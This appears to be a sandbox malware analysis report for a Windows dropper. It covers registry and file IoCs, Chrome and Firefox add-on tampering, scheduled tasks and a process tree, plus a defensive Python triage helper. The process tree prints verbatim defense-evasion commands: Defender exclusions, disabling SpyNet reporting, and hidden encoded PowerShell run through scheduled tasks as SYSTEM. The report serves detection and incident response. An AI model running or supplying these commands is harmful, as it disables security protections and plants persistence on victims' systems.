Analysis

max time kernel: 170s
max time network: 177s
platform: windows10-2004_x64
resource: win10v2004-20221111-en
resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
submitted: 23-11-2022 06:33

Static task: static1
Behavioral task: behavioral1 (sample: file.exe, resource: win7-20220901-en)
Note that the task listing names a Windows 7 resource while the run reported on this page executed on the win10v2004-20221111-en image.

General

Target: file.exe
Size: 7.2MB
MD5: b374f37c729ba81d8328173c325af442
SHA1: 9392040af20e507482bb1b3b4249060107240610
SHA256: f4b26d3c7a28964d229a292471dcb8247a1112f19397c57755f5a25e49acd3c1
SHA512: 15f29d2bb4b244aa33cd066d8900296e284153a1a683979f6a944004fe11443b42f1aa93f6d30a06aa12476a350c7210c25d1feef6aa927cfbcae07e890576fc
SSDEEP: 196608:91OZI3K3nEkGjraBNvx3RdfjK7ZFwvrfzSEb/W:3ODEkGjraBNx3Rd7K7ZkWEb/W
Malware Config
Signatures
Blocklisted process makes network request (1 IoC)
Processes:
flow | pid | process
115 | 4692 | rundll32.exe

Executes dropped EXE (4 IoCs)
Processes:
pid | process
2404 | Install.exe
1696 | Install.exe
4220 | XzswOIF.exe
3816 | UuEaWBB.exe
Checks BIOS information in registry (2 TTPs, 2 IoCs)
BIOS information is often read in order to detect sandboxing environments: on virtual machines the SystemBiosVersion and SystemProductName values carry hypervisor-specific strings.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rundll32.exe
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up the country code configured in the registry (the user's Geo\Nation value), most likely to geofence execution.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation | Install.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation | UuEaWBB.exe
Loads dropped DLL (1 IoC)
Processes:
pid | process
4692 | rundll32.exe
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials, cookies and browsing history.

Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate the software installed on the system.
Drops Chrome extension (1 IoC)
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json | UuEaWBB.exe

Drops desktop.ini file(s) (1 IoC)
S-1-5-18 is the SID of the SYSTEM account, so the recycle-bin folder touched here belongs to the SYSTEM context UuEaWBB.exe ran in.
Processes:
description | ioc | process
File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | UuEaWBB.exe
Drops file in System32 directory (27 IoCs)
The CryptnetUrlCache and INetCache entries under config\systemprofile are the SYSTEM account's certificate-retrieval and WinINet caches, so UuEaWBB.exe ran as SYSTEM and performed certificate-chain validation with network fetches. The writes to GroupPolicy\gpt.ini and GroupPolicy\Machine\Registry.pol, together with the gpupdate /force run from the scheduled task in the process tree, are consistent with setting Windows Defender policy through the local GPO so that it is re-applied on every policy refresh.
Processes:
description | ioc | process
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | UuEaWBB.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3B8C7C973B30115D9F846695C38BBC1F | UuEaWBB.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3B8C7C973B30115D9F846695C38BBC1F | UuEaWBB.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | UuEaWBB.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | UuEaWBB.exe
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | powershell.exe
File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | XzswOIF.exe
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | UuEaWBB.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | UuEaWBB.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | UuEaWBB.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_DD5E18651A85E635F184F73BE6D3DB70 | UuEaWBB.exe
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | UuEaWBB.exe
File created | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | UuEaWBB.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | UuEaWBB.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | UuEaWBB.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_4A183155DB502CF599F3A8AD6680B8C3 | UuEaWBB.exe
File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | XzswOIF.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | UuEaWBB.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | UuEaWBB.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | UuEaWBB.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | UuEaWBB.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | UuEaWBB.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_DD5E18651A85E635F184F73BE6D3DB70 | UuEaWBB.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_4A183155DB502CF599F3A8AD6680B8C3 | UuEaWBB.exe
Drops file in Program Files directory (14 IoCs)
omni.ja is Firefox's packed archive of its own browser code and resources; rewriting it (after taking an omni.ja.bak copy) and adding a .xpi under browser\features modifies the browser and installs an add-on as a system add-on without user consent. The DLL and XML pairs under randomly named Program Files (x86) folders are the components the scheduled tasks and the rundll32.exe entries above load.
Processes:
description | ioc | process
File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | UuEaWBB.exe
File created | C:\Program Files (x86)\zjyBtxSiMuSUC\PbaOlpn.dll | UuEaWBB.exe
File created | C:\Program Files (x86)\bNrcflyMMmUn\azqzHjg.dll | UuEaWBB.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | UuEaWBB.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | UuEaWBB.exe
File created | C:\Program Files (x86)\InaIvrjBgGxU2\bgHqXYFIAPtcv.dll | UuEaWBB.exe
File created | C:\Program Files (x86)\pGMaoMOmU\gqYIPc.dll | UuEaWBB.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | UuEaWBB.exe
File created | C:\Program Files (x86)\InaIvrjBgGxU2\eyuRBEh.xml | UuEaWBB.exe
File created | C:\Program Files (x86)\GMdDEZUiqAWOMLthmzR\xSwKdTD.xml | UuEaWBB.exe
File created | C:\Program Files (x86)\zjyBtxSiMuSUC\IGhrHkk.xml | UuEaWBB.exe
File created | C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | UuEaWBB.exe
File created | C:\Program Files (x86)\pGMaoMOmU\PNLEqsS.xml | UuEaWBB.exe
File created | C:\Program Files (x86)\GMdDEZUiqAWOMLthmzR\wCPOnfC.dll | UuEaWBB.exe
Drops file in Windows directory (4 IoCs)
A .job file in C:\Windows\Tasks is written for tasks created in the legacy format (schtasks /V1), as the bvffOywEAsomCrOclN creation in the process tree does. Only that one of the four creations appears with its command line in the tree on this page; the other three belong to schtasks.exe invocations listed under "Creates scheduled task(s)".
Processes:
description | ioc | process
File created | C:\Windows\Tasks\GqChQHaYBumcgGPDT.job | schtasks.exe
File created | C:\Windows\Tasks\bvffOywEAsomCrOclN.job | schtasks.exe
File created | C:\Windows\Tasks\aClwDgKsxBQnbYjuF.job | schtasks.exe
File created | C:\Windows\Tasks\yKRLlrVxZRCwfvY.job | schtasks.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). The sandbox labels this as likely ransomware behaviour, but the heuristic is generic and should be weighed against the rest of this report, which shows no mass file encryption.
Creates scheduled task(s) (1 TTP, 11 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution. Here it serves both purposes: a one-shot task run immediately as the logged-on user to execute an encoded PowerShell command, and a task running as SYSTEM to launch a dropped executable (see the process tree).
Processes:
pid | process
3112 | schtasks.exe
2264 | schtasks.exe
2012 | schtasks.exe
3088 | schtasks.exe
1744 | schtasks.exe
2112 | schtasks.exe
2704 | schtasks.exe
1432 | schtasks.exe
4824 | schtasks.exe
4688 | schtasks.exe
4660 | schtasks.exe
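The two schtasks /CREATE command lines in the process tree further down this page show the sample's two uses of the scheduler: a one-shot task as the logged-on user whose action is an encoded, hidden PowerShell command (run with /run and then deleted), and a task as SYSTEM whose action is a dropped executable in the user's Temp directory. The following Python helper is an added example written for this page, not code from the report or from the sample. It parses those two command lines (copied verbatim from the tree), decodes the -EncodedCommand payload (PowerShell encodes the script as base64 over its UTF-16LE bytes) and records the properties a responder would escalate on. The finding names and the checks are chosen for this example.

```python
import base64
import re
import shlex

# The two "schtasks /CREATE" command lines copied verbatim from the process tree of this report.
TASK_CREATE_USER = r'''schtasks /CREATE /TN "gcXzYbaby" /SC once /ST 05:57:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="'''
TASK_CREATE_SYSTEM = r'''schtasks /CREATE /TN "bvffOywEAsomCrOclN" /SC once /ST 07:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\tpJIuSEupLAEZXYwF\lJBlQvjZsVtqrIl\XzswOIF.exe\" Bp /site_id 525403 /S" /V1 /F'''

# powershell.exe accepts -EncodedCommand and its prefixes (-e, -ec, -enc, -encoded ...).
ENCODED_FLAG = re.compile(r"(?i)-e(?:c|nc(?:oded(?:command)?)?)?\s+([A-Za-z0-9+/=]{8,})")
USER_TEMP = re.compile(r"(?i)\\AppData\\Local\\Temp\\")
HIDDEN_WINDOW = re.compile(r"(?i)-WindowStyle\s+Hidden")


def parse_schtasks(cmdline):
    """Map each /SWITCH (upper-cased) to its value, or True for a bare switch.

    shlex's POSIX rules happen to fit these lines: inside double quotes a
    backslash is kept unless it precedes a quote, which is exactly how the
    escaped quotes inside the /TR value must be read. A general Windows
    parser would follow CommandLineToArgvW instead. Assumption: a switch
    value never starts with '/'."""
    argv = shlex.split(cmdline, posix=True)
    opts, i = {}, 1  # argv[0] is schtasks itself
    while i < len(argv):
        if i + 1 < len(argv) and not argv[i + 1].startswith("/"):
            opts[argv[i].upper()] = argv[i + 1]
            i += 2
        else:
            opts[argv[i].upper()] = True
            i += 1
    return opts


def decode_encoded_command(b64):
    """-EncodedCommand carries base64 of the script's UTF-16LE bytes."""
    return base64.b64decode(b64).decode("utf-16-le")


def triage_task(cmdline):
    """Summarise one 'schtasks /CREATE' line; 'findings' lists the flags
    worth escalating (names chosen for this example)."""
    opts = parse_schtasks(cmdline)
    action = opts.get("/TR") if isinstance(opts.get("/TR"), str) else ""
    run_as = opts.get("/RU") if isinstance(opts.get("/RU"), str) else None
    m = ENCODED_FLAG.search(action)
    decoded = decode_encoded_command(m.group(1)) if m else None
    findings = []
    if run_as and run_as.upper() in ("SYSTEM", "NT AUTHORITY\\SYSTEM"):
        findings.append("runs as SYSTEM")
    if USER_TEMP.search(action):
        findings.append("action under user Temp")
    if decoded is not None:
        findings.append("encoded PowerShell")
    if HIDDEN_WINDOW.search(action) or (decoded and HIDDEN_WINDOW.search(decoded)):
        findings.append("hidden window")
    if "/V1" in opts:  # legacy format also leaves a .job file in C:\Windows\Tasks
        findings.append("legacy /V1 format (.job file in C:\\Windows\\Tasks)")
    return {"name": opts.get("/TN"), "run_as": run_as,
            "schedule": (opts.get("/SC"), opts.get("/ST")),
            "action": action, "decoded": decoded, "findings": findings}


if __name__ == "__main__":
    for line in (TASK_CREATE_USER, TASK_CREATE_SYSTEM):
        r = triage_task(line)
        print(r["name"], "as", r["run_as"], "->", ", ".join(r["findings"]))
        if r["decoded"]:
            print("   decoded:", r["decoded"])
```

Run stand-alone it prints the two task summaries; the decoded payload of gcXzYbaby is the PowerShell line "start-process -WindowStyle Hidden gpupdate.exe /force", which matches the powershell.EXE and gpupdate.exe entries in the tree. The same parser works on schtasks command lines taken from Sysmon event 1 or Security event 4688, but it does not handle a backslash immediately before a closing quote in a path, which CommandLineToArgvW would treat differently.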
Enumerates system info in registry (2 TTPs, 4 IoCs)
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | rundll32.exe
Modifies data under HKEY_USERS (64 IoCs)
All of these keys sit under \REGISTRY\USER\.DEFAULT, the profile used by processes running as SYSTEM. The empty SystemCertificates container keys (CA, Root, TrustedPeople, Disallowed, trust, SmartCardRoot and their Certificates/CRLs/CTLs subkeys) are what crypt32 creates the first time a process in that context opens the per-user certificate stores; only "Key created" entries appear, no certificates are added. The BitBucket, Internet Settings and Explorer values written by UuEaWBB.exe are the SYSTEM profile's recycle-bin and WinINet defaults being initialised.
Processes:
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d2609e0b-0000-0000-0000-d01200000000}\NukeOnDelete = "0" | UuEaWBB.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d2609e0b-0000-0000-0000-d01200000000}\MaxCapacity = "15140" | UuEaWBB.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | UuEaWBB.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | UuEaWBB.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d2609e0b-0000-0000-0000-d01200000000} | UuEaWBB.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer | UuEaWBB.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket | UuEaWBB.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.exe
Suspicious behavior: EnumeratesProcesses (40 IoCs)
Processes:
pid | process | entries
4400 | powershell.EXE | 2
228 | powershell.exe | 2
4664 | powershell.exe | 2
4260 | powershell.EXE | 2
3816 | UuEaWBB.exe | 32
Suspicious use of AdjustPrivilegeToken (4 IoCs)
Processes:
description | pid | process
Token: SeDebugPrivilege | 4400 | powershell.EXE
Token: SeDebugPrivilege | 228 | powershell.exe
Token: SeDebugPrivilege | 4664 | powershell.exe
Token: SeDebugPrivilege | 4260 | powershell.EXE
Suspicious use of WriteProcessMemory (64 IoCs)
The 64 entries are grouped here by parent and child; the repeated entries for each pair are the writes a parent makes into a newly created child during process start-up. The list is cut off at 64 entries by the report, so the last pair is incomplete.
Processes:
source pid | source process | target pid | target process | writes
4352 | file.exe | 2404 | Install.exe | 3
2404 | Install.exe | 1696 | Install.exe | 3
1696 | Install.exe | 1468 | forfiles.exe | 3
1696 | Install.exe | 5116 | forfiles.exe | 3
1468 | forfiles.exe | 2612 | cmd.exe | 3
5116 | forfiles.exe | 2096 | cmd.exe | 3
2096 | cmd.exe | 3376 | reg.exe | 3
2612 | cmd.exe | 4232 | reg.exe | 3
2612 | cmd.exe | 204 | reg.exe | 3
2096 | cmd.exe | 116 | reg.exe | 3
1696 | Install.exe | 2704 | schtasks.exe | 3
1696 | Install.exe | 3164 | schtasks.exe | 3
4400 | powershell.EXE | 1580 | gpupdate.exe | 2
1696 | Install.exe | 3956 | schtasks.exe | 3
1696 | Install.exe | 3112 | schtasks.exe | 3
4220 | XzswOIF.exe | 228 | powershell.exe | 3
228 | powershell.exe | 2136 | cmd.exe | 3
2136 | cmd.exe | 4760 | reg.exe | 3
228 | powershell.exe | 4568 | reg.exe | 3
228 | powershell.exe | 3696 | reg.exe | 3
228 | powershell.exe | 3508 | reg.exe | 3
228 | powershell.exe | 3168 | reg.exe | 2 (list truncated)
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4352 -
C:\Users\Admin\AppData\Local\Temp\7zSBD98.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Users\Admin\AppData\Local\Temp\7zSC364.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2612 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:4232
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:204
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:5116 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2096 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:3376
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:116
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gcXzYbaby" /SC once /ST 05:57:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:2704 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gcXzYbaby"4⤵PID:3164
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gcXzYbaby"4⤵PID:3956
-
